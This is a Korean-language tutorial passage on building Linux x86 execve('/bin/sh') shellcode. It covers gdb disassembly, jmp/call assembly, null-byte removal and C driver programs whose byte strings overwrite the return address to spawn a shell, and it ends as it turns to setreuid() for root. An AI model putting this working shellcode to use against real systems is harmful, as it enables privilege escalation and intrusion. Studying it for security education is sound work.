\ucc98\uc74c \ub4e4\uc5b4\uc624\uba74\uc11c %ebp\ub97c \ucd08\uae30 %esp\uac12\uc73c\ub85c \uc124\uc815\ud55c\ub2e4. 
<br \/><br \/>0x80481df &lt;main+3&gt;: &nbsp; &nbsp; sub &nbsp;&nbsp; $0x8,%esp <br \/>char *name[2];&nbsp; \uc8fc\uc18c(4\ubc14\uc774\ud2b8) * 2 = 8\ubc14\uc774\ud2b8\ub97c \ubcc0\uc218\uacf5\uac04\uc73c\ub85c \ud655\ubcf4. <br \/><br \/>0x80481e2 &lt;main+6&gt;: &nbsp; &nbsp; movl &nbsp; $0x808b228,0xfffffff8(%ebp) <br \/>name[0] = \"\/bin\/sh\";&nbsp; %ebp\ub97c \uae30\uc900\uc73c\ub85c -8\ubc14\uc774\ud2b8 \uc704\uce58\uc5d0 \ubb38\uc790\uc5f4\uc758 \uc8fc\uc18c\ub97c \ub123\uc74c. <br \/><br \/>0x80481e9 &lt;main+13&gt;: &nbsp;&nbsp; movl &nbsp; $0x0,0xfffffffc(%ebp) <br \/>name[1] = NULL; &nbsp;&nbsp; %ebp\uae30\uc900 -4\ubc14\uc774\ud2b8 \uc704\uce58\uc5d0 0\uc744 \ub123\uc74c. <br \/><br \/>0x80481f0 &lt;main+20&gt;: &nbsp;&nbsp; push &nbsp; $0x0 <br \/>0\uc744 stack\uc5d0 \uc800\uc7a5\ud568. <br \/><br \/>0x80481f2 &lt;main+22&gt;: &nbsp;&nbsp; lea &nbsp;&nbsp; 0xfffffff8(%ebp),%eax <br \/>%ebp -8\uc5d0 \uc8fc\uc18c(\ubb38\uc790\uc5f4\uc8fc\uc18c)\ub97c %eax\uc5d0 \ub123\uc74c. \uc8fc\uc18c\uc758 \uc8fc\uc18c. <br \/><br \/>0x80481f5 &lt;main+25&gt;: &nbsp;&nbsp; push &nbsp; %eax <br \/>\ubb38\uc790\uc5f4 \uc8fc\uc18c\uc758 \uc8fc\uc18c\ub97c stack\uc5d0 \uc800\uc7a5\ud568. <br \/><br \/>0x80481f6 &lt;main+26&gt;: &nbsp;&nbsp; pushl&nbsp; 0xfffffff8(%ebp) <br \/>\ubb38\uc790\uc5f4\uc758 \uc8fc\uc18c\ub97c stack\uc5d0 \uc800\uc7a5\ud568. <br \/><br \/>0x80481f9 &lt;main+29&gt;: &nbsp;&nbsp; call &nbsp; 0x804c36c &lt;__execve&gt; <br \/>execve()\ud568\uc218\ub97c \ud638\ucd9c\ud568. 
<br \/><br \/>0x804c36c &lt;__execve&gt;: &nbsp; push &nbsp; %ebp <br \/>0x804c36d &lt;__execve+1&gt;: mov &nbsp;&nbsp; $0x0,%eax <br \/>0x804c372 &lt;__execve+6&gt;: mov &nbsp;&nbsp; %esp,%ebp <br \/>\uc774 \uc2ef\uc810\uc5d0\uc11c stack\uc5d0 \uc313\uc5ec\uc788\ub294 data\ub97c \ubcf4\uba74 <br \/><br \/>&nbsp; &nbsp; &nbsp; &nbsp; +---------------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; &nbsp;&nbsp; %ebp &nbsp; &nbsp; | &nbsp; &lt;--- %ebp \uac12 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; (\ub0ae\uc740 \uc8fc\uc18c) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +---------------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; &nbsp;&nbsp; ret &nbsp; &nbsp;&nbsp; | &nbsp;&nbsp; %ebp + 0x04 <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +---------------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp;&nbsp; name[0] &nbsp;&nbsp; | &nbsp;&nbsp; %ebp + 0x08 &nbsp;&nbsp; ---&gt; %ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +---------------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; &nbsp; name &nbsp; &nbsp;&nbsp; | &nbsp; &nbsp; %ebp + 0x0c &nbsp;&nbsp; ---&gt; %ecx &nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +---------------+ <br \/>&nbsp; &nbsp; &nbsp; &nbsp; | &nbsp; &nbsp; 0x00 &nbsp; &nbsp;&nbsp; | &nbsp;&nbsp; %ebp + 0x10 &nbsp;&nbsp; ---&gt; %edx &nbsp; &nbsp; &nbsp; (\ub192\uc740 \uc8fc\uc18c) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; +---------------+ <br \/><br \/>0x804c374 &lt;__execve+8&gt;: test &nbsp; %eax,%eax <br \/>0x804c376 &lt;__execve+10&gt;: &nbsp; &nbsp; &nbsp;&nbsp; push &nbsp; %edi <br \/>0x804c377 &lt;__execve+11&gt;: &nbsp; &nbsp; &nbsp;&nbsp; push &nbsp; %ebx <br \/>0x804c378 &lt;__execve+12&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; 0x8(%ebp),%edi <br \/>0x804c37b &lt;__execve+15&gt;: &nbsp; &nbsp; &nbsp;&nbsp; je &nbsp; &nbsp; 0x804c382 &lt;__execve+22&gt; <br \/>0x804c37d &lt;__execve+17&gt;: &nbsp; &nbsp; &nbsp;&nbsp; call &nbsp; 0x0 <br \/>0x804c382 &lt;__execve+22&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; 0xc(%ebp),%ecx <br 
\/>0x804c385 &lt;__execve+25&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; 0x10(%ebp),%edx <br \/>0x804c388 &lt;__execve+28&gt;: &nbsp; &nbsp; &nbsp;&nbsp; push &nbsp; %ebx <br \/>0x804c389 &lt;__execve+29&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; %edi,%ebx <br \/>0x804c38b &lt;__execve+31&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; $0xb,%eax <br \/>0x804c390 &lt;__execve+36&gt;: &nbsp; &nbsp; &nbsp;&nbsp; int &nbsp;&nbsp; $0x80 <br \/><br \/>\ucd5c\uc885\uc801\uc73c\ub85c int $0x80\uc774\uc804\uc5d0 %eax,%ebx,%ecx,%edx\uc5d0 \uac12\ub4e4\uc774 \uc544\ub798\uc640 \uac19\uc774 \ucc44\uc6cc\uc9c4 \uac83\uc744 \ubcfc\uc218 \uc788\ub2e4. <br \/><br \/>&nbsp; &nbsp; &nbsp;&nbsp; %eax &nbsp; ---&gt; &nbsp;&nbsp; 0xb &nbsp;&nbsp; ( execve()\uc5d0 \ub300\ud55c system call No. ) <br \/>&nbsp; &nbsp; &nbsp;&nbsp; %ebx &nbsp; ---&gt; &nbsp;&nbsp; name[0] <br \/>&nbsp; &nbsp; &nbsp;&nbsp; %ecx &nbsp; ---&gt; &nbsp;&nbsp; name <br \/>&nbsp; &nbsp; &nbsp;&nbsp; %edx &nbsp; ---&gt; &nbsp;&nbsp; 0x00&nbsp; ( execve()\uc758 \ub9c8\uc9c0\ub9c9 \uc778\uc218 ) <br \/><br \/>\uc774 \uc815\ubcf4\ub97c \uac00\uc9c0\uace0 \uc5b4\uc148\ube14\ub9ac\ub85c shellcode \ud504\ub85c\uae00\ub7a8\uc744 \ub9cc\ub4e4\uc5b4 \ubcf4\uc790. \uc774 shellcode\ub97c \uad6c\ud604\ud558\uae30 \uc704\ud574\uc11c\ub294 <br \/>2\uac00\uc9c0 \ub354 \uace0\ub824\ud574\uc57c \ud560 \uc810\uc774 \uc788\ub2e4. \ud558\ub098\ub294 \ubb38\uc790\uc5f4\uc758 \ub05d\uc5d0 NULL\uc744 \ub123\uc5b4\uc11c \ubb38\uc790\uc758 \ub05d\uc744 \uc54c\ub9ac\ub294 \uc791\uc5c5\uc744&nbsp; <br \/>\ud574\uc57c \ud558\uba70, \ub2e4\ub978 \ud558\ub098\ub294 name\uc744 \uad6c\ud604\ud574 \uc918\uc57c \ud55c\ub2e4\ub294 \uac83\uc774\ub2e4.&nbsp; \uc989 name = [\ubb38\uc790\uc5f4\uc8fc\uc18c]+[NULL] \uc774\ub2e4. 
<br \/>\uadf8\ub798\uc11c \ubb38\uc790\uc5f4\uc758 \uc704\uce58\ub294 jmp &amp; call\uc744 \uc774\uc6a9\ud558\uc5ec \uc0c1\ub300\uc8fc\uc18c\ub97c \uc54c\uc218 \uc788\uc73c\ubbc0\ub85c \ubb38\uc790\uc5f4 \ub4a4\uc5d0 name\ub97c \uad6c\ud604 <br \/>\ud558\uba74\ub41c\ub2e4. \uc544\ub798 \uc5b4\uc148\ube14\ub9ac \ud504\ub85c\uadf8\ub7a8\uc744 \ubcf4\uc790. <br \/><br \/><br \/>[willy@Null@Root]$ cat test51.s <br \/>.globl main <br \/>main: <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; jmp &nbsp; &nbsp; strings <br \/>start: &nbsp; popl &nbsp;&nbsp; %esi &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &lt;--- \ubb38\uc790\uc5f4 \uc704\uce58 (\ubb38\uc790\uc5f4\uc740 \/bin\/sh 7\uc790) <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; movb &nbsp;&nbsp; $0x00,0x7(%esi) &nbsp; &nbsp; &lt;--- \ubb38\uc790\uc5f4 \ub05d\uc5d0 NULL\uc704\uce58 (\ubb38\uc790\uc5f4\uc774 \ub05d\ub0a8\uc744 \uc54c\ub9bc) <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; movl &nbsp;&nbsp; %esi, 0x8(%esi) &nbsp; &nbsp; &lt;--- name[0]\uc744 \uad6c\ud604\ud558\uae30 \uc704\ud574 \ubb38\uc790\uc5f4 \ub4a4\uc5d0 \ub123\uc74c. <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; movl &nbsp;&nbsp; $0x00,0xc(%esi) &nbsp; &nbsp; &lt;--- name[1]\uc744 \uad6c\ud604\ud558\uae30 \uc704\ud574\uc11c name[0]\ub4a4\uc5d0 NULL\uc744 \ub123\uc74c. <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; movl &nbsp;&nbsp; $0x0b,%eax &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &lt;--- %eax\uc5d0 0xb(11)\uc744 \ub123\uc5b4 execve() system call\ud568.&nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; movl &nbsp;&nbsp; %esi, %ebx &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &lt;--- %ebx\uc5d0 \ubb38\uc790\uc5f4\uc744 \ub123\uc74c. <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; leal &nbsp;&nbsp; 0x8(%esi), %ecx &nbsp; &nbsp; &lt;--- %ecx\uc5d0 name = name[0]+name[1]\uc744 \ub123\uc74c. <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; movl &nbsp;&nbsp; 0xc(%esi), %edx &nbsp; &nbsp; &lt;--- %edx\uc5d0 NULL(0x00)\uc744 \ub123\ub294\ub2e4. 
<br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; int &nbsp; &nbsp; $0x80 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;--- interrupt 0x80\uc744 \ud574\uc11c system call\uc744 \ud568. <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; movl &nbsp;&nbsp; $0x01,%eax <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; movl &nbsp;&nbsp; $0x00,%ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; int &nbsp; &nbsp; $0x80 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;--- exit(0) system call. &nbsp; <br \/>strings: call start <br \/>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; .string \"\/bin\/sh\" <br \/><br \/>[willy@Null@Root]$ gcc test51.s -o test51 <br \/><br \/>[willy@Null@Root]$ objdump -d test51 <br \/><br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; : <br \/>0804841c &lt;main&gt;: <br \/>804841c: &nbsp; &nbsp; &nbsp; eb 2a &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jmp &nbsp;&nbsp; 8048448 &lt;strings&gt; <br \/><br \/>0804841e &lt;start&gt;: <br \/>804841e: &nbsp; &nbsp; &nbsp; 5e &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; pop &nbsp;&nbsp; %esi <br \/>804841f: &nbsp; &nbsp; &nbsp; c6 46 07 00 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; movb &nbsp; $0x0,0x7(%esi) <br \/>8048422: &nbsp; &nbsp; &nbsp; 89 76 08 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; %esi,0x8(%esi) <br \/>8048426: &nbsp; &nbsp; &nbsp; c7 46 0c 00 00 00 00 &nbsp;&nbsp; movl &nbsp; $0x0,0xc(%esi) <br \/>804842d: &nbsp; &nbsp; &nbsp; b8 0b 00 00 00 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; $0xb,%eax <br \/>8048432: &nbsp; &nbsp; &nbsp; 89 f3 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mov &nbsp;&nbsp; %esi,%ebx <br \/>8048434: &nbsp; &nbsp; &nbsp; 8d 4e 08 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; lea &nbsp;&nbsp; 0x8(%esi),%ecx <br \/>8048437: &nbsp; &nbsp; &nbsp; 8b 56 0c &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; 0xc(%esi),%edx <br \/>804843a: &nbsp; &nbsp; &nbsp; cd 80 &nbsp; &nbsp; 
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; int &nbsp;&nbsp; $0x80 <br \/>804843c: &nbsp; &nbsp; &nbsp; b8 01 00 00 00 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; $0x1,%eax <br \/>8048441: &nbsp; &nbsp; &nbsp; bb 00 00 00 00 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; $0x0,%ebx <br \/>8048446: &nbsp; &nbsp; &nbsp; cd 80 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; int &nbsp;&nbsp; $0x80 <br \/><br \/>08048448 &lt;strings&gt;: <br \/>8048448: &nbsp; &nbsp; &nbsp; e8 d1 ff ff ff &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; call &nbsp; 804841e &lt;start&gt; <br \/>804844d: &nbsp; &nbsp; &nbsp; 2f &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; das &nbsp; &nbsp; <br \/>804844e: &nbsp; &nbsp; &nbsp; 62 69 6e &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; bound&nbsp; %ebp,0x6e(%ecx) <br \/>8048451: &nbsp; &nbsp; &nbsp; 2f &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; das &nbsp; &nbsp; <br \/>8048452: &nbsp; &nbsp; &nbsp; 73 68 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jae &nbsp;&nbsp; 80484bc &lt;gcc2_compiled.+0x20&gt; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; : <br \/><br \/>\uc5ec\uae30\uc11c \uc5bb\uc5b4\uc9c4 \uae30\uacc4\uc5b4\ucf54\ub4dc\ub97c \uc815\ub9ac\ud574\uc11c \uc544\ub798 test43.c\uc640 \uac19\uc774 ret \uc8fc\uc18c\uc5d0 \uae30\uacc4\uc5b4\ucf54\ub4dc\uac00 \ub4e4\uc5b4\uac00\ub3c4\ub85d <br \/>\ud558\ub294 shellcode\uad6c\ub3d9 \ud504\ub85c\uadf8\ub7a8\uc744 \ub9cc\ub4e4\uc5b4 \uc2e4\ud589\ud574 \ubcf4\uc790. 
<br \/><br \/>[willy@Null@Root]$ cat test43.c&nbsp; <br \/><br \/>char sc[] = <br \/>\"\\xeb\\x2a\\x5e\\xc6\\x46\\x07\\x00\\x89\\x76\\x08\\xc7\\x46\\x0c\\x00\\x00\\x00\\x00\" <br \/>\"\\xb8\\x0b\\x00\\x00\\x00\\x89\\xf3\\x8d\\x4e\\x08\\x8b\\x56\\x0c\\xcd\\x80\\xb8\\x01\" <br \/>\"\\x00\\x00\\x00\\xbb\\x00\\x00\\x00\\x00\\xcd\\x80\\xe8\\xd1\\xff\\xff\\xff\/bin\/sh\"; <br \/><br \/>main() <br \/>{ <br \/>&nbsp;&nbsp; int *ret; <br \/><br \/>&nbsp;&nbsp; ret = (int *)&amp;ret + 2; <br \/>&nbsp;&nbsp; (*ret) = (int)sc; <br \/>} <br \/><br \/>[willy@Null@Root]$ gcc test43.c -o test43 <br \/><br \/>[willy@Null@Root]$ .\/test43 <br \/>sh-2.04$&nbsp; <br \/><br \/>shell\uc744 \uc5bb\ub294\ub370 \uc131\uacf5\ud558\uc600\ub2e4.. \ucd5c\uc885\uc801\uc73c\ub85c \ucf54\ub4dc\ub0b4\uc5d0 NULL\uc774 \ub098\ud0c0\ub098\ub294 \ubd80\ubd84\uc744 \uc544\ub798 test52.s\uc640 \uac19\uc774 <br \/>\uc218\uc815\ud558\uace0 \uc774\ubc88\uc5d0\ub294 gdb\ub97c \uc774\uc6a9\ud558\uc5ec \uae30\uacc4\uc5b4\ucf54\ub4dc\ub97c \ub9cc\ub4e4\uc5b4 \ubcf4\uc790. 
<br \/><br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; \uc218\uc815\uc804 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \uc218\uc815\ud6c4 &nbsp; <br \/>&nbsp; &nbsp; &nbsp;&nbsp; ----------------------------+------------------------------ <br \/>&nbsp; &nbsp; &nbsp;&nbsp; movb &nbsp;&nbsp; $0x00,0x7(%esi) &nbsp; &nbsp; | &nbsp; &nbsp;&nbsp; xor &nbsp;&nbsp; %eax,&nbsp; %eax <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | &nbsp; &nbsp;&nbsp; movb &nbsp; %al, &nbsp; 0x7(%esi) <br \/>&nbsp; &nbsp; &nbsp;&nbsp; movl &nbsp;&nbsp; $0x00,0xc(%esi) &nbsp; &nbsp; | &nbsp; &nbsp;&nbsp; movl &nbsp; %eax,&nbsp; 0xc(%esi) <br \/>&nbsp; &nbsp; &nbsp;&nbsp; movl &nbsp;&nbsp; 0xc(%esi), %edx &nbsp; &nbsp; | &nbsp; &nbsp;&nbsp; xor &nbsp;&nbsp; %edx,&nbsp; %edx <br \/><br \/>[willy@Null@Root]$ cat test52.s <br \/>.globl main <br \/>main: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; jmp &nbsp; &nbsp; strings <br \/>start:&nbsp; popl &nbsp;&nbsp; %esi <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; %esi, 0x8(%esi) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; xor &nbsp; &nbsp; %eax,&nbsp; %eax <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movb &nbsp;&nbsp; %al, 0x7(%esi) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; %eax, 0xc(%esi) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movb &nbsp;&nbsp; $0x0b, %al <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; %esi, %ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; leal &nbsp;&nbsp; 0x8(%esi), %ecx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; xor &nbsp; &nbsp; %edx, %edx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; int &nbsp; &nbsp; $0x80 <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movb &nbsp;&nbsp; $0x01,%al <br \/>&nbsp; &nbsp; &nbsp; &nbsp; xor &nbsp; &nbsp; %ebx, %ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; int &nbsp; &nbsp; $0x80 <br \/>strings:call start <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .string \"\/bin\/sh\" <br \/><br \/><br \/>[willy@Null@Root]$ gcc 
test52.s -o test52 <br \/><br \/>\ucef4\ud37c\uc77c\ud55c\ub4a4 gdb\ub85c \uc2e4\ud589\ud654\uc77c\ub97c \uc5f0\ud6c4 disassemble main\uc744 \ud574\ubcf4\uba74 \ubc14\ub85c jump\uac00 \uc2dc\uc791\ub418\ub294 \uac83\uc744 \ubcfc\uc218&nbsp; <br \/>\uc788\ub2e4. \uadf8\ub7ec\ubbc0\ub85c x\/40bx main \ud558\uba74 \uae30\uacc4\uc5b4\ucf54\ub4dc\ub97c \ubcfc\uc218 \uc788\ub2e4.&nbsp; <br \/><br \/>[willy@Null@Root]$ gdb -q test52 <br \/>(gdb) disassem main <br \/>Dump of assembler code for function main: <br \/>0x804841c &lt;main&gt;: &nbsp; &nbsp; &nbsp; jmp &nbsp;&nbsp; 0x804843b &lt;strings&gt; <br \/>End of assembler dump. <br \/>(gdb) disassem start <br \/>Dump of assembler code for function start: <br \/>0x804841e &lt;start&gt;: &nbsp; &nbsp;&nbsp; pop &nbsp;&nbsp; %esi <br \/>0x804841f &lt;start+1&gt;: &nbsp;&nbsp; mov &nbsp;&nbsp; %esi,0x8(%esi) <br \/>0x8048422 &lt;start+4&gt;: &nbsp;&nbsp; xor &nbsp;&nbsp; %eax,%eax <br \/>0x8048424 &lt;start+6&gt;: &nbsp;&nbsp; mov &nbsp;&nbsp; %al,0x7(%esi) <br \/>0x8048427 &lt;start+9&gt;: &nbsp;&nbsp; mov &nbsp;&nbsp; %eax,0xc(%esi) <br \/>0x804842a &lt;start+12&gt;: &nbsp; mov &nbsp;&nbsp; $0xb,%al <br \/>0x804842c &lt;start+14&gt;: &nbsp; mov &nbsp;&nbsp; %esi,%ebx <br \/>0x804842e &lt;start+16&gt;: &nbsp; lea &nbsp;&nbsp; 0x8(%esi),%ecx <br \/>0x8048431 &lt;start+19&gt;: &nbsp; xor &nbsp;&nbsp; %edx,%edx <br \/>0x8048433 &lt;start+21&gt;: &nbsp; int &nbsp;&nbsp; $0x80 <br \/>0x8048435 &lt;start+23&gt;: &nbsp; mov &nbsp;&nbsp; $0x1,%al <br \/>0x8048437 &lt;start+25&gt;: &nbsp; xor &nbsp;&nbsp; %ebx,%ebx <br \/>0x8048439 &lt;start+27&gt;: &nbsp; int &nbsp;&nbsp; $0x80 <br \/>End of assembler dump. 
<br \/>(gdb) disassem strings <br \/>Dump of assembler code for function strings: <br \/>0x804843b &lt;strings&gt;: &nbsp;&nbsp; call &nbsp; 0x804841e &lt;start&gt; <br \/>0x8048440 &lt;strings+5&gt;:&nbsp; das &nbsp; &nbsp; <br \/>0x8048441 &lt;strings+6&gt;:&nbsp; bound&nbsp; %ebp,0x6e(%ecx) <br \/>0x8048444 &lt;strings+9&gt;:&nbsp; das &nbsp; &nbsp; <br \/>0x8048445 &lt;strings+10&gt;: jae &nbsp;&nbsp; 0x80484af &lt;_fini+35&gt; <br \/>0x8048447 &lt;strings+12&gt;: add &nbsp;&nbsp; %dl,0x90909090(%eax) <br \/>0x804844d &lt;strings+18&gt;: nop &nbsp; &nbsp; <br \/>0x804844e &lt;strings+19&gt;: nop &nbsp; &nbsp; <br \/>0x804844f &lt;strings+20&gt;: nop &nbsp; &nbsp; <br \/>End of assembler dump. <br \/>(gdb) x\/40bx main <br \/>0x804841c &lt;main&gt;: &nbsp; &nbsp; &nbsp; 0xeb &nbsp;&nbsp; 0x1d &nbsp;&nbsp; 0x5e &nbsp;&nbsp; 0x89 &nbsp;&nbsp; 0x76 &nbsp;&nbsp; 0x08 &nbsp;&nbsp; 0x31 &nbsp;&nbsp; 0xc0 <br \/>0x8048424 &lt;start+6&gt;: &nbsp;&nbsp; 0x88 &nbsp;&nbsp; 0x46 &nbsp;&nbsp; 0x07 &nbsp;&nbsp; 0x89 &nbsp;&nbsp; 0x46 &nbsp;&nbsp; 0x0c &nbsp;&nbsp; 0xb0 &nbsp;&nbsp; 0x0b <br \/>0x804842c &lt;start+14&gt;: &nbsp; 0x89 &nbsp;&nbsp; 0xf3 &nbsp;&nbsp; 0x8d &nbsp;&nbsp; 0x4e &nbsp;&nbsp; 0x08 &nbsp;&nbsp; 0x31 &nbsp;&nbsp; 0xd2 &nbsp;&nbsp; 0xcd <br \/>0x8048434 &lt;start+22&gt;: &nbsp; 0x80 &nbsp;&nbsp; 0xb0 &nbsp;&nbsp; 0x01 &nbsp;&nbsp; 0x31 &nbsp;&nbsp; 0xdb &nbsp;&nbsp; 0xcd &nbsp;&nbsp; 0x80 &nbsp;&nbsp; 0xe8 <br \/>0x804843c &lt;strings+1&gt;:&nbsp; 0xde &nbsp;&nbsp; 0xff &nbsp;&nbsp; 0xff &nbsp;&nbsp; 0xff &nbsp;&nbsp; 0x2f &nbsp;&nbsp; 0x62 &nbsp;&nbsp; 0x69 &nbsp;&nbsp; 0x6e <br \/><br \/>\uc5ec\uae30\uc11c \uad6c\ud55c \uae30\uacc4\uc5b4\ucf54\ub4dc\ub97c shellcode \uad6c\ub3d9 \ud504\ub85c\uadf8\ub7a8(test44.c)\uc5d0 \ub123\uc5b4 \uc2e4\ud589\uc2dc\ud0a4\uba74 \uc815\uc0c1\uc801\uc73c\ub85c <br \/>shell\uc774 \ub728\ub294\uac83\uc744 \ud655\uc778\ud560\uc218 \uc788\ub2e4. 
<br \/><br \/>[willy@Null@Root]$ cat test44.c&nbsp; <br \/>char sc1[] = <br \/>\"\\xeb\\x1d\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\" <br \/>\"\\x4e\\x08\\x31\\xd2\\xcd\\x80\\xb0\\x01\\x31\\xdb\\xcd\\x80\\xe8\\xde\\xff\\xff\\xff\/bin\/sh\"; <br \/><br \/>main() <br \/>{ <br \/>&nbsp;&nbsp; int *ret; <br \/><br \/>&nbsp;&nbsp; ret = (int *)&amp;ret + 2; <br \/>&nbsp;&nbsp; (*ret) = (int)sc1; <br \/>} <br \/><br \/>[willy@Null@Root]$ gcc test44.c -o test44 <br \/><br \/>[willy@Null@Root]$ .\/test44 <br \/>sh-2.04$ ps <br \/>&nbsp; PID TTY &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; TIME CMD <br \/>9238 pts\/6 &nbsp;&nbsp; 00:00:00 bash <br \/>9262 pts\/6 &nbsp;&nbsp; 00:00:00 sh <br \/>9264 pts\/6 &nbsp;&nbsp; 00:00:00 ps <br \/><br \/>\uc774\uc81c shellcode\ub97c \uc644\uc131\ud558\uc600\ub2e4. \uadf8\ub7ec\ub098 linux 7.0\uc774\uc0c1\uc5d0\uc11c \uc774 shellcode\ub97c \uc0ac\uc6a9\ud558\uae30 \uc704\ud574\uc11c\ub294 \ud558\ub098\ub354 <br \/>\uae30\uacc4\ucf54\ub4dc\ub97c \ub9cc\ub4e4\uc5b4 \uc8fc\uc5b4\uc57c \ud55c\ub2e4. \uadf8\uac83\uc740 \ubc14\ub85c setreuid()\uc744 shellcode\uc55e\uc5d0 \ucd94\uac00\ud558\ub294 \uac83\uc774\ub2e4. <br \/>setreuid()\uc758 \uae30\uacc4\uc5b4\ucf54\ub4dc \ub9cc\ub4dc\ub294 \uac83\uc5d0 \ub300\ud574\uc11c\ub294 \ub2e8\uc21c\ud558\uae30 \ub54c\ubb38\uc5d0 \uc790\uc138\ud788 \uc124\uba85\ud558\uc9c0 \uc54a\ub294\ub2e4.&nbsp; <br \/>root uid\ub97c \uc124\uc815\ud558\ub294 setreuid() \ucf54\ub4dc\ub294 \uc544\ub798\uc640 \uac19\ub2e4. 
